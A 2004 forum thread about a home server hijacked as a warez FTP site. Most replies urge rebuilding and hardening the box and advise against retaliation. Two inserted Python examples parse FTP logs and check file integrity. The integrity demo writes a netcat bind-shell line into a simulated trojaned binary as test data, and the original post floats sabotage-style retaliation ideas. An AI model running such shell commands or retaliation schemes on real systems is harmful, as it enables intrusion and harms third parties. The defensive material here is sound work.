Best way to deal with someone breaking into my machine?
  • Best way to deal with someone breaking into my machine?

    Ok, here's the story.....

    The other day, I noticed that my internet connection was extremely slow. Further investigation revealed that my server machine outside my DMZ was the source of the slowdown. It turns out my server had been turned into a warez FTP site.

    Now I do admit that the machine was my "sacrificial lamb" - security was intentionally low, all the stuff of real importance is backed up on CD-Rom etc, so I could re-format the drive and not shed a tear about lost data. And, of course, the FTP site used a "universal login" I had set up for a project and forgotten about (username: user, password: user) - and again, the data that is of value is backed up already.

    What I want to know is, how should I deal with this transgression? I don't really want to make a big stink, I'm really not interested in prosecuting the persons who used my server. I just want to get the idea across that I don't really appreciate people using my server without my permission. I have log files of the IP addresses that connected to and used my server. While it was kinda my fault for leaving the user/user account, it still was annoying to deal with.

    I could, of course, re-open the user/user account on my server, but corrupt the warez files on the system so people spend hours downloading garbage.... Or, I could program the system to drop the connection after 99% of the file has been downloaded, and not allow reconnect transfers.....

    Any thoughts? Oh, and yes, I have disabled the user/user login in my system!

    -Wembley

  • #2
    Originally posted by wembley
    [clip]
    What I want to know is, how should I deal with this transgression?
    [clip]
    Reformat, rebuild, reinstall, improve security, do not retaliate.

    Check your audit trails to make sure this was not used as a jump point for other machines.

    Retaliation will make you "look bad" and can lead to an arms race and escalation and the defender [may eventually] run the risk of DDoS when there are many attackers, or fairly skilled, but small numbers of attackers. Choosing to "fight back" by corrupting or trojaning software can also put you in jail (if in the U.S.) depending on what you do.

    The easiest path for you, and least work, with least risk for yourself seems to be to learn from the mistake and move on. The cost of retaliation includes *not* learning something else or improving yourself over the same time.

    [Added content above in [ ] and below]

    From TAoW: (paraphrased) Do not start a battle if you cannot win. If you cannot win a battle, focus on defense or look to postpone engaging until you can win.
    Last edited by TheCotMan; June 14, 2004, 19:26. Reason: Added content

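The "check your audit trails" advice above is easier to act on with a small script than by eyeballing the transfer log. The following is an added example, not code from the thread or from any of the posters: it parses FTP transfer-log lines in the classic xferlog format (the whitespace-separated format written by wu-ftpd and vsftpd), then summarizes, per remote host, what the compromised account uploaded and downloaded, which files are now staged on the box, and produces one line per host suitable for an abuse report. The sample log lines are constructed for the example (addresses are from documentation ranges) and the account name `user` and path layout are assumptions; real xferlog lines replace spaces in filenames with underscores, which the parser relies on.

```python
import re
from datetime import datetime

# Constructed sample lines in xferlog format; NOT taken from the thread.
# Fields: timestamp, transfer secs, remote host, bytes, path, type (a/b),
# special action, direction (i=upload, o=download), access mode (a/g/r),
# username, service, auth method, authenticated user id, status (c/i).
SAMPLE_XFERLOG = """\
Sat Jun 12 02:14:07 2004 41 203.0.113.17 734003200 /home/user/incoming/Some.Game.bin b _ i r user ftp 0 * c
Sat Jun 12 02:15:33 2004 2 203.0.113.17 1024 /home/user/incoming/readme.nfo b _ i r user ftp 0 * c
Sat Jun 12 11:40:12 2004 1803 198.51.100.9 734003200 /home/user/incoming/Some.Game.bin b _ o r user ftp 0 * c
Sat Jun 12 11:41:01 2004 1 198.51.100.9 1024 /home/user/incoming/readme.nfo b _ o r user ftp 0 * c
Sat Jun 12 23:05:44 2004 900 192.0.2.77 367001600 /home/user/incoming/Some.Game.bin b _ o r user ftp 0 * i
Sun Jun 13 03:22:10 2004 3 192.0.2.200 5120 /home/user/www/index.html a _ o r wembley ftp 0 * c
"""

XFERLOG_RE = re.compile(r"""
    ^(?P<ts>\w{3}\s+\w{3}\s+\d{1,2}\s+\d\d:\d\d:\d\d\s+\d{4})\s+
    (?P<secs>\d+)\s+(?P<host>\S+)\s+(?P<size>\d+)\s+(?P<path>\S+)\s+
    (?P<type>[ab])\s+(?P<action>\S)\s+(?P<dir>[iod])\s+(?P<mode>[agr])\s+
    (?P<user>\S+)\s+(?P<service>\S+)\s+(?P<auth>\d)\s+(?P<authuser>\S+)\s+
    (?P<status>[ci])\s*$""", re.X)


def parse_xferlog(text):
    """Parse xferlog lines into dicts; lines that do not match are skipped."""
    records = []
    for line in text.splitlines():
        m = XFERLOG_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["ts"] = datetime.strptime(rec["ts"], "%a %b %d %H:%M:%S %Y")
        rec["size"] = int(rec["size"])
        rec["secs"] = int(rec["secs"])
        records.append(rec)
    return records


def summarize_account(records, account):
    """Per remote host: what the given account pushed in and pulled out."""
    hosts = {}
    for r in records:
        if r["user"] != account:
            continue
        h = hosts.setdefault(r["host"], {
            "uploads": 0, "downloads": 0, "bytes_in": 0, "bytes_out": 0,
            "incomplete": 0, "first": r["ts"], "last": r["ts"]})
        if r["dir"] == "i":
            h["uploads"] += 1
            h["bytes_in"] += r["size"]
        elif r["dir"] == "o":
            h["downloads"] += 1
            h["bytes_out"] += r["size"]   # for status 'i' this is bytes actually sent
        if r["status"] != "c":
            h["incomplete"] += 1
        h["first"] = min(h["first"], r["ts"])
        h["last"] = max(h["last"], r["ts"])
    return hosts


def staged_files(records, account):
    """Paths uploaded through the account: the material you are now hosting."""
    return sorted({r["path"] for r in records
                   if r["user"] == account and r["dir"] == "i"})


def abuse_report(hosts):
    """One line per remote host, busiest first, ready for an ISP abuse mail."""
    ordered = sorted(hosts.items(),
                     key=lambda kv: -(kv[1]["bytes_in"] + kv[1]["bytes_out"]))
    return ["%-16s %s .. %s  up:%d (%d B)  down:%d (%d B)  incomplete:%d" % (
                host, h["first"].isoformat(sep=" "), h["last"].isoformat(sep=" "),
                h["uploads"], h["bytes_in"], h["downloads"], h["bytes_out"],
                h["incomplete"])
            for host, h in ordered]


if __name__ == "__main__":
    recs = parse_xferlog(SAMPLE_XFERLOG)
    print("files staged via user/user:", staged_files(recs, "user"))
    for line in abuse_report(summarize_account(recs, "user")):
        print(line)
```

The upload hosts are the ones who staged the files and are worth reporting; the download hosts are mostly just leechers who found the site in a list. Note that the transfer log only shows the FTP side of the story; whether the box was also used as a jump point has to come from elsewhere (firewall or router logs of outbound connections from the server, shell history, new cron entries), which this script does not cover.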


    • #3
      I agree with thecotman. Personally, after I've imaged more machines than I can count in one day, I get bored/tired/depressed, whatever; I still try and make sure that that machine can't be easily compromised. I'm basically afraid a compromised box could lead to a 'launch point' for that person to attack other boxes.

      I'd personally reimage the machine and report the person to their ISP; most ISPs that I know of today have a very low tolerance for that kind of service abuse. Even if their ISP could care less, at least if you harden it, chances are they won't be back.

      After you reinstall the OS, harden it to the best of your ability, and then create an image of that clean install, so that if it happens again, you're just an image install away from a clean box. Review your logs, collect, regroup, and fix whatever allowed the compromise.

      From my limited experience, unless you have something someone explicitly wants (besides just gaining control of the box), most people will bypass your box if they find out the basic, well-known exploits have been patched. I bet by keeping the software packages up to date and changing the default passwords it'll be a lot longer before you get rooted again....unless you have a neighbor that likes to fuck with you.



      • #4
        When you say "outside the DMZ" I take it you mean that it is on the Internet on the other side of your Firewall? That is the Wild West my friend. I don't expect a box to last a day out there.



        • #5
          Not sure if it is justified for this case, but I like to use the baseball bat technique for spammers and spyware authors... Just talking about it may do the job :D No need to actually do it...
          In the case of hacking, what could be useful is to make fake pictures of a script kiddie beaten up, so that once the said hacker breaks into your computer and finds those, he might want to stay away from your computer :)
          /* NO COMMENT */



          • #6
            you know you're lame when you go to a computer security conference forum looking for help to retaliate some 'lamer' who sodomized your ass.



            • #7
              Originally posted by phobal
              you know you're lame when you go to a computer security conference forum looking for help to retaliate some 'lamer' who sodomized your ass.

              But Phobal, you're Bi... Doesn't that mean you enjoy getting your ass sodomized? If so, you can't really use it as an insult.



              • #8
                Too late, you already made a big stink. It was your fault, not "kind of". You parked your car in Watts and left the keys inside; what did you expect?
                So they turned your box into a warez FTP. Did you not notice your disk space being eaten up by the uploading of warez?
                calling the man, blah! just let it go and move on.
                "so many books, so little time"



                • #9
                  By leaving your box basically open to attack you pretty much deserve whatever they hit you with. If you want security then you need to lock your stuff down and not *ever* do idiotic things like making the password the same as the username and picking "user" as a username. Secure your stuff first, then think about retribution.
                  --- The fuck? Have you ever BEEN to Defcon?



                  • #10
                    Well, like I said, this box had nothing of value, just a few pictures, etc, and some WWW programs that I wanted access to from outside the firewall. While it was kinda my fault for leaving a username user with PW user, I was looking for creative ways to deal with the people who got in.

                    The theory is that if someone "haxx0red" my box outside the firewall, they wouldn't do anything to any of the stuff inside my firewall where the important stuff lives....

                    -Wembley



                    • #11
                      Originally posted by wembley
                      The theory is that if someone "haxx0red" my box outside the firewall, they wouldn't do anything to any of the stuff inside my firewall where the important stuff lives....
                      This is probably not a good idea to put into practice. If your external box gets "owned" then they will likely have a high-bandwidth jump point from which to launch other attacks [against your other machines.] Also, if this host is used by authorized users to gain access to hosts behind the firewall, then MitM or key-grabbing tools or other password retention programs can be used to leverage this exposed system access to include control of other machines behind your firewall.

                      [Edit: added content above, in [ ], which was omitted in first round.]
                      Last edited by TheCotMan; June 15, 2004, 19:19. Reason: added content



                      • #12
                        It's not what's *on* the box that's valuable, it's the box itself. Remember that *you* are liable for what goes on on machines that you own, and on the network connection that you pay for. Having a box rooted and turned into a warez server puts you at huge legal risk if, say, the RIAA comes knocking. Who knows, you could be one of their next 1000 lawsuits.
                        --- The fuck? Have you ever BEEN to Defcon?



                        • #13
                          Originally posted by wembley
                          While it was kinda my fault for leaving a username user with PW user
                          No, it was completely your fault that the user name and password were set to the same values [user].

                          Originally posted by wembley
                          I was looking for creative ways to deal with the people who got in.
                          As for dealing with people who broke into your system and then staged warez and attacks off of your box, suck it up, start over and learn from the experience (and *ahem* make backups of the "evidence" in case any form of prosecution occurs).

                          Rebuild your box, place it in a dmz behind a firewall with appropriate security measures in place. If it's just website/ftp access you require, NAT/PAT those services through your firewall. Use SFTP and HTTPS. After the box is rebuilt, run tripwire and then re-run tripwire periodically to verify the box has been hacked. Your boxen have already been demonstrated vulnerable. The same people who hit the first time may very well come back looking for more. Don't give it to them.

                          While you're at it, if you are an enterprising individual, you could visit The Honeynet Project and create a REAL "sacrificial lamb" [as stated in your first post]. Watching what happens to your box configured as a honeypot could be a valuable learning experience.

                          hth
                          Last edited by spahkle; June 17, 2004, 01:58. Reason: kept switching tenses
                          “Bigamy is having one wife too many. Monogamy is the same.”

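Post #13's advice to baseline the rebuilt box with tripwire and re-check it periodically is worth seeing in miniature. The following is an added example, not tripwire itself and not code from the thread: it walks a directory tree, records a SHA-256 digest, size and permission bits for every regular file (and the target of every symlink, without following it), stores that baseline as JSON, and reports files that were added, removed or modified when run again. The `demo()` function builds a small constructed tree in a temporary directory, tampers with it the way an intruder would (replaces a binary, adds a startup file, deletes one, and changes permissions on another without touching its contents) and returns the diff; the file names in it are assumptions for illustration only.

```python
import hashlib
import json
import os
import stat
import tempfile


def file_digest(path, chunk_size=1 << 16):
    """SHA-256 of a file's contents, read in chunks so large files stay out of memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Map each entry under root (relative, '/'-separated) to what should not change.

    Symlinks are recorded by target and not followed, so a planted link cannot
    redirect the walk; devices, sockets and fifos are skipped entirely.
    """
    baseline = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            st = os.lstat(full)
            if stat.S_ISLNK(st.st_mode):
                baseline[rel] = {"type": "symlink", "target": os.readlink(full)}
            elif stat.S_ISREG(st.st_mode):
                baseline[rel] = {"type": "file", "sha256": file_digest(full),
                                 "size": st.st_size,
                                 "mode": oct(stat.S_IMODE(st.st_mode))}
    return baseline


def compare(baseline, current):
    """Report what changed between a stored baseline and a fresh scan."""
    old, new = set(baseline), set(current)
    return {
        "added": sorted(new - old),
        "removed": sorted(old - new),
        "modified": sorted(p for p in old & new if baseline[p] != current[p]),
    }


def save_baseline(baseline, path):
    with open(path, "w") as f:
        json.dump(baseline, f, indent=1, sort_keys=True)


def load_baseline(path):
    with open(path) as f:
        return json.load(f)


def demo():
    """Build a throwaway tree, baseline it, tamper with it, return the diff."""
    with tempfile.TemporaryDirectory() as root, tempfile.TemporaryDirectory() as store:
        os.makedirs(os.path.join(root, "bin"))
        os.makedirs(os.path.join(root, "etc"))
        # constructed "clean install"; names are illustrative, not a real layout
        for rel, data in [("bin/ls", b"#!/bin/sh\nexec /usr/bin/ls \"$@\"\n"),
                          ("etc/passwd", b"root:x:0:0:root:/root:/bin/sh\n"),
                          ("etc/motd", b"welcome\n")]:
            with open(os.path.join(root, rel), "wb") as f:
                f.write(data)
        os.chmod(os.path.join(root, "bin/ls"), 0o755)
        os.chmod(os.path.join(root, "etc/passwd"), 0o644)

        # baseline lives OUTSIDE the tree it describes
        baseline_path = os.path.join(store, "baseline.json")
        save_baseline(build_baseline(root), baseline_path)

        # simulated intrusion: trojaned binary, persistence file, deleted file,
        # and a permission change with identical contents
        with open(os.path.join(root, "bin/ls"), "wb") as f:
            f.write(b"#!/bin/sh\nnc -l -p 31337 -e /bin/sh &\nexec /usr/bin/ls \"$@\"\n")
        with open(os.path.join(root, "etc/rc.local"), "wb") as f:
            f.write(b"/bin/ls >/dev/null\n")
        os.remove(os.path.join(root, "etc/motd"))
        os.chmod(os.path.join(root, "etc/passwd"), 0o600)

        return compare(load_baseline(baseline_path), build_baseline(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

Two caveats a practitioner would want: the baseline and the checker itself must be kept off the box (read-only media, or a host the server cannot write to), because an intruder with root on the server will update both to match; and once the box is suspected, run the check from clean boot media rather than with the server's own binaries, since a replaced `sha256sum` or Python can lie about everything else.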


                          • #14
                            Originally posted by wembley
                            What I want to know is, how should I deal with this transgression? I don't really want to make a big stink, I'm really not interested in prosecuting the persons who used my server. I just want to get the idea across that I don't really appreciate people using my server without my permission. I have log files of the IP addresses that connected to and used my server.

                            I could, of coure, re-open the user/user account on my server, but corrupt the warez files on the system so people spend hours downloading garbage.... Or, I could program the system to drop the connection after 99% of the file has been downloaded, and not allow reconnect transfers.....
                            Originally posted by phobal
                            you know you're lame when you go to a computer security conference forum looking for help to retaliate some 'lamer' who sodomized your ass.
                            If you notice, Wembley at no point requested assistance in "retaliating" against the people who did this action. He asked for ideas in how to respond to a system intrusion. The majority of responses have been "rebuild/restore, learn, protect yourself better in the future."

                            Your response didn't make much sense to me. I have to ask, why wouldn't he ask his question (a valid question otherwise the admins would have moved it to /dev/null by now) in this forum? I realize we can't all be l33t like yourself with visions of self-grandeur looking down our nose at anybody who posts to the forum... but help us troglodytes out. Help us see the error of our ways for treating his request with the seriousness it merits.
                            “Bigamy is having one wife too many. Monogamy is the same.”
